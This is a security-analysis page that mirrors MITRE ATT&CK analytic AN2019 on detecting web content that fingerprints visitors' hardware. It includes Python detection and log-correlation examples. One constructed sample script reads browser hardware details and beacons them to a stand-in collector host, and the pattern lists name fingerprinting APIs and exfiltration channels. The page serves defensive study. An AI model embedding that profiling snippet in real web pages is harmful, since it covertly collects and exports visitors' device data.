MITRE ATT&CK® Analytic

AN2019: Analytic 2019

Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.[1][2] Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Enterprise | AN2019 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

This analytic concerns the difficulty of detecting internet-facing content that may collect visitors’ host hardware information, for example the reconnaissance frameworks used in watering-hole style activity. For leaders, the practical issue is not a single alert rule but whether the organization has visibility into pre-compromise exposure and related initial-access indicators, given that the suspicious activity may occur outside normal enterprise telemetry.

Executive priority

Treat this as a visibility and readiness question. Because ATT&CK notes high occurrence, high false-positive potential, and activity that may happen outside the target organization’s view, executives should ask whether threat intelligence, external attack surface monitoring, web telemetry, and incident response processes can connect suspicious external infrastructure or web content to later initial-access risk. This can inform budget decisions around managed detection, threat intelligence, and external exposure monitoring, but the supplied object does not support claims of guaranteed detection or specific business impact.

Technical view

SOC and detection teams should validate whether they collect evidence relevant to externally hosted malicious or suspicious web content that collects visitor hardware information. Since no official detection logic is provided and the platform is PRE, coverage should focus on correlation and triage rather than a standalone high-confidence alert. Useful validation includes checking whether external web scanning results, threat intelligence reports, proxy/DNS/web access logs, and incident timelines can be tied to related stages such as Initial Access, as ATT&CK suggests.

Likely telemetry

  • External attack surface or internet scanning results for suspicious web content patterns
  • Threat intelligence reporting on infrastructure and watering-hole style reconnaissance frameworks
  • Web proxy, secure web gateway, or browser access logs showing visits to suspicious pages
  • DNS resolution logs for domains linked to suspicious infrastructure
  • Web server/referrer telemetry where the organization controls potentially affected web properties
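The first bullet above, scan results for suspicious content patterns, is the one data source this analytic names directly. The following is an added example, not code from MITRE, Glexia or any scanner product, of the kind of pattern check such a scan applies to fetched page content. The browser property names are real web-platform APIs that expose host hardware or rendering details; the grouping, the threshold of three such reads plus an outbound channel, and the three sample pages are assumptions made for illustration, not a signature for ScanBox or any other framework.

```python
"""Score web content for host-hardware-collection patterns.

Added example for this page; not MITRE's or Glexia's code and not a
published signature for any specific framework. The property names are
real browser APIs that expose host hardware or rendering details; the
grouping, threshold and sample pages are assumptions made here.
"""
import re

# Browser APIs that reveal host hardware details. Each is common in benign
# analytics, responsive layout and diagnostics code on its own, which is
# why any one of them is a weak signal.
HARDWARE_PATTERNS = {
    "hardware_concurrency": r"navigator\.hardwareConcurrency",
    "device_memory": r"navigator\.deviceMemory",
    "platform": r"navigator\.platform",
    "screen_geometry": r"screen\.(?:width|height|colorDepth)",
    "webgl_renderer": r"WEBGL_debug_renderer_info|UNMASKED_RENDERER_WEBGL",
    "plugins": r"navigator\.plugins",
    "max_touch_points": r"navigator\.maxTouchPoints",
}

# Ways the collected values typically leave the browser.
EXFIL_PATTERNS = {
    "xhr_or_fetch": r"XMLHttpRequest|\bfetch\(",
    "beacon": r"navigator\.sendBeacon",
    "image_beacon": r"new Image\(\)",
}


def score_content(body: str, min_hw_apis: int = 3) -> dict:
    """Return which hardware APIs and exfil channels appear in `body`.

    A page is flagged only when it reads several hardware properties AND
    contains a channel to send them somewhere. Many reads with no outbound
    channel, or one read with an outbound channel, is left for analyst
    review rather than flagged, which keeps the noise down.
    """
    hw = sorted(n for n, p in HARDWARE_PATTERNS.items() if re.search(p, body))
    ex = sorted(n for n, p in EXFIL_PATTERNS.items() if re.search(p, body))
    return {
        "hardware_apis": hw,
        "exfil": ex,
        "suspicious": len(hw) >= min_hw_apis and bool(ex),
    }


# --- Constructed sample pages (not real sites) --------------------------
BENIGN_ANALYTICS = """
<script>
  var w = screen.width;                 // responsive layout choice
  fetch("/pixel?w=" + w);               // first-party pageview counter
</script>
"""

LOCAL_DIAGNOSTICS = """
<script>
  document.getElementById("out").textContent =
    navigator.hardwareConcurrency + " cores, " +
    navigator.deviceMemory + " GB, " + navigator.platform;  // displayed, not sent
</script>
"""

PROFILING_CONTENT = """
<script>
  var p = {
    hc: navigator.hardwareConcurrency, dm: navigator.deviceMemory,
    pl: navigator.platform, sw: screen.width, sh: screen.height,
    tp: navigator.maxTouchPoints
  };
  var gl = document.createElement("canvas").getContext("webgl");
  var ext = gl.getExtension("WEBGL_debug_renderer_info");
  p.gpu = gl.getParameter(ext.UNMASKED_RENDERER_WEBGL);
  new Image().src = "//collector.example/c?" + encodeURIComponent(JSON.stringify(p));
</script>
"""

SAMPLES = {
    "benign-analytics": BENIGN_ANALYTICS,
    "local-diagnostics": LOCAL_DIAGNOSTICS,
    "profiling-content": PROFILING_CONTENT,
}


def triage(pages: dict) -> list:
    """Rank pages for analyst review: flagged first, then by API count."""
    rows = [(label, score_content(body)) for label, body in pages.items()]
    rows.sort(key=lambda r: (not r[1]["suspicious"], -len(r[1]["hardware_apis"])))
    return rows


if __name__ == "__main__":
    for label, result in triage(SAMPLES):
        flag = "FLAG" if result["suspicious"] else "    "
        print(f"{flag} {label:20} hw={result['hardware_apis']} exfil={result['exfil']}")
```

The three samples show why ATT&CK warns about false positives: a first-party pageview counter and a page that merely displays hardware details read the same APIs as the profiler, and only the combination of several reads with an outbound channel is flagged. A real scanner would also have to fetch externally loaded scripts and deal with obfuscation, which this check does not attempt.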

Detection direction

  • Do not rely on a single signature alone; ATT&CK states this activity may have very high occurrence and false positives.
  • Prioritize enrichment and correlation with domain reputation, infrastructure context, web access patterns, and subsequent Initial Access evidence.
  • Validate whether the organization has visibility into activity that may occur outside its environment; if not, document the blind spot rather than overstating coverage.
  • Tune detections to separate broad internet noise from content or infrastructure that is relevant to the organization’s users, partners, or exposed web assets.
  • Use analyst review for context-heavy findings because the official object provides no detection procedure or tactic mapping.
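The enrichment and correlation the list above calls for, as an added example that is not part of the MITRE object or Glexia's tooling: it joins an indicator list (of the kind an external scan or intelligence report might supply) against proxy and DNS logs, pairs each exposure with later events on the same source, and lists indicators that never appear in local telemetry so the gap can be documented rather than read as "no exposure". The key=value log format, the `.example` domains, every log line and the downstream events are constructed for this example.

```python
"""Correlate flagged web infrastructure with local web, DNS and follow-on telemetry.

Added example for this page; not MITRE's or Glexia's code. The key=value log
format, the indicator list, the log lines and the downstream events are all
constructed for illustration. Real proxy, DNS and endpoint schemas differ and
need their own parsers.
"""
import re
from datetime import datetime, timedelta

# Constructed indicator list: domains an external scan or an intel report
# flagged for visitor-profiling content. The value is triage context, not a verdict.
INDICATORS = {
    "profile-cdn.example": "external scan: hardware-profiling script",
    "stats-relay.example": "intel report: watering-hole reconnaissance kit",
    "never-seen.example": "intel report: related infrastructure",
}

# Constructed proxy log, one request per line.
PROXY_LOG = """\
2024-03-04T09:12:31Z user=alice src=10.0.1.5 host=intranet.corp.example url=/ status=200
2024-03-04T09:12:40Z user=alice src=10.0.1.5 host=profile-cdn.example url=/stats.js status=200
2024-03-04T11:02:03Z user=bob src=10.0.1.9 host=news.example url=/ status=200
2024-03-05T14:20:11Z user=carol src=10.0.2.7 host=stats-relay.example url=/p?x=1 status=200
"""

# Constructed DNS log. A lookup with no matching proxied request still counts
# as exposure (direct or non-proxied client).
DNS_LOG = """\
2024-03-04T09:12:39Z src=10.0.1.5 qname=profile-cdn.example qtype=A
2024-03-06T08:00:00Z src=10.0.3.2 qname=stats-relay.example qtype=A
"""

# Constructed downstream events of the kind an Initial Access investigation
# looks for after an exposure: (timestamp, source IP, description).
DOWNSTREAM_EVENTS = [
    ("2024-03-04T09:15:02Z", "10.0.1.5", "browser spawned a script interpreter"),
    ("2024-03-07T10:00:00Z", "10.0.2.7", "helpdesk password reset"),
]

KV = re.compile(r"(\w+)=(\S+)")
TS = "%Y-%m-%dT%H:%M:%SZ"


def parse_kv(line: str) -> dict:
    """Parse 'TIMESTAMP key=value ...' into a dict with a datetime under 'ts'."""
    ts, rest = line.split(" ", 1)
    rec = dict(KV.findall(rest))
    rec["ts"] = datetime.strptime(ts, TS)
    return rec


def _note(seen: dict, src: str, domain: str, ts: datetime, via: str, user=None) -> None:
    """Merge one piece of evidence into the (source, domain) exposure record."""
    e = seen.setdefault((src, domain), {"src": src, "domain": domain,
                                        "first_seen": ts, "via": set(), "user": None})
    e["first_seen"] = min(e["first_seen"], ts)
    e["via"].add(via)
    if user and not e["user"]:
        e["user"] = user


def exposures(proxy_log: str, dns_log: str, indicators: dict) -> list:
    """One record per (source, flagged domain), merging proxy and DNS evidence."""
    seen = {}
    for line in proxy_log.splitlines():
        r = parse_kv(line)
        if r["host"] in indicators:
            _note(seen, r["src"], r["host"], r["ts"], "proxy", r.get("user"))
    for line in dns_log.splitlines():
        r = parse_kv(line)
        if r["qname"] in indicators:
            _note(seen, r["src"], r["qname"], r["ts"], "dns")
    return sorted(seen.values(), key=lambda e: e["first_seen"])


def follow_on(exps: list, events: list, window: timedelta = timedelta(hours=24)) -> list:
    """Pair each exposure with downstream events on the same source inside the window."""
    hits = []
    for e in exps:
        for ts, src, desc in events:
            t = datetime.strptime(ts, TS)
            if src == e["src"] and e["first_seen"] <= t <= e["first_seen"] + window:
                hits.append((e["user"] or e["src"], e["domain"], desc))
    return hits


def blind_spots(exps: list, indicators: dict) -> list:
    """Flagged domains with no local evidence: a visibility gap to record, not a clean result."""
    seen = {e["domain"] for e in exps}
    return sorted(d for d in indicators if d not in seen)


if __name__ == "__main__":
    exps = exposures(PROXY_LOG, DNS_LOG, INDICATORS)
    for e in exps:
        who = e["user"] or e["src"]
        print(f"{e['first_seen']:%Y-%m-%d %H:%M}  {who:10} {e['domain']:22} "
              f"via={sorted(e['via'])}  ({INDICATORS[e['domain']]})")
    for who, dom, desc in follow_on(exps, DOWNSTREAM_EVENTS):
        print(f"ESCALATE: {who} visited {dom}, then: {desc}")
    for dom in blind_spots(exps, INDICATORS):
        print(f"NO LOCAL TELEMETRY: {dom} (record as visibility gap)")
```

The 24-hour `window` and the choice to merge proxy and DNS evidence per source are tuning decisions; in practice the downstream event list would come from endpoint or identity telemetry rather than a literal, and the indicator context string is what an analyst reads before deciding whether the exposure is relevant to this organization at all.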

Mitigation priorities

  • Establish or validate external visibility sources such as threat intelligence and attack surface monitoring before treating this as a SOC-only detection problem.
  • Ensure proxy, DNS, and web access logging are retained long enough to support incident response correlation when suspicious infrastructure is identified.
  • Create triage playbooks that connect suspicious web content findings to user exposure review and Initial Access investigation paths.
  • Where organization-owned web properties are involved, coordinate web security review, content integrity checks, and incident response handling.
  • Document known visibility gaps for compliance and risk reporting, especially where suspicious activity occurs outside enterprise-controlled telemetry.

Analyst notes and limits

The object is a detection analytic, not a technique, and includes no official detection logic, no tactic mapping, and no relationships. The strongest defensible interpretation is that this analytic highlights a hard-to-detect pre-compromise reconnaissance or exposure pattern involving malicious content that may collect hardware information from visitors.

This take is limited to the supplied ATT&CK fields and references. It does not establish active exploitation, attribution, affected organizations, specific tools in current use, or detection coverage. Local telemetry, web exposure, user browsing patterns, and threat intelligence sources are required to determine operational relevance.

Official MITRE ATT&CK definition

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: f0bf3a47e1b45a9a...

Imported snapshots across ATT&CK releases (1)

Release: 19.1
Bundle imported:
Object version: 1.0
Modified:
Status: Current bundle
Raw hash: f0bf3a47e1b4…

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] ThreatConnect Infrastructure Dec 2020: ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.
  2. [2] ATT ScanBox: Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.
  3. [3] mitre-attack AN2019: mirrored ATT&CK source object for this analytic.

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.